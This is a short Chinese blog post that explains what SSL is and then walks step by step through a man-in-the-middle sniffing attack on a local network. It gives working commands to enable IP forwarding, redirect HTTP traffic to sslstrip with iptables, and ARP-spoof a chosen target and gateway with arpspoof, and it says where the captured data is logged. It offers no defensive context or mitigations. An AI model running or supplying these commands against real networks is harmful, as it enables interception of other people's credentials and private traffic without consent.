HTTPS反向代理嗅探
兩年前的文章,一直在本地筆記放著,發現博客上竟然沒存。發出來。
先說說什么是SSL:
SSL是Secure Socket Layer的簡稱,中文意思是安全套接層,由NetScape公司開發,用來保障在Internet上的數據傳輸安全,確保數據在網絡的傳輸過程中不被截取和竊聽。被廣泛用于Web瀏覽器與服務器之間的身份認證和數據加密傳輸。
SSL協議提供的服務主要有:
- 認證用戶和服務器,確保數據發送到正確的客戶和服務器。
- 加密數據,防止中間人竊取。
- 維護數據的完整性,確保數據在傳輸過程中無法被改變。
此次實驗用到了兩款工具,SSLstrip和Arpspoof。
把網卡改成轉發模式:
echo '1' > /proc/sys/net/ipv4/ip_forward
在iptables里添加規則,把所有http數據導入到sslstrip中。
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
然后開啟sslstrip:
sslstrip -a -l <listenPort> -w XXX.log(保存的文件名)
然后重新開一個終端,使用arpspoof進行網絡欺騙:
arpspoof -i eth0(你的網卡) -t 192.168.1.X(這個是你的目標IP) 192.168.1.1(這個是你的網關)
然后一半在欺騙大概1分鐘之后,你就能攔截到數據了。打開你的sslstrip的文件夾,里面有一個你設置的XXX.log文件,就是嗅探到的數據。
注:嗅探時,sslstrip會報錯,不用管它。如果沒嗅探到數據,檢查完步驟語法什么的沒有出錯后,可能是被攔截沒有欺騙成功。
本文發于:安全大可文章轉載請注明出處:http://im404.cnblogs.com
相關事宜請聯系:im404@qq.com

浙公網安備 33010602011771號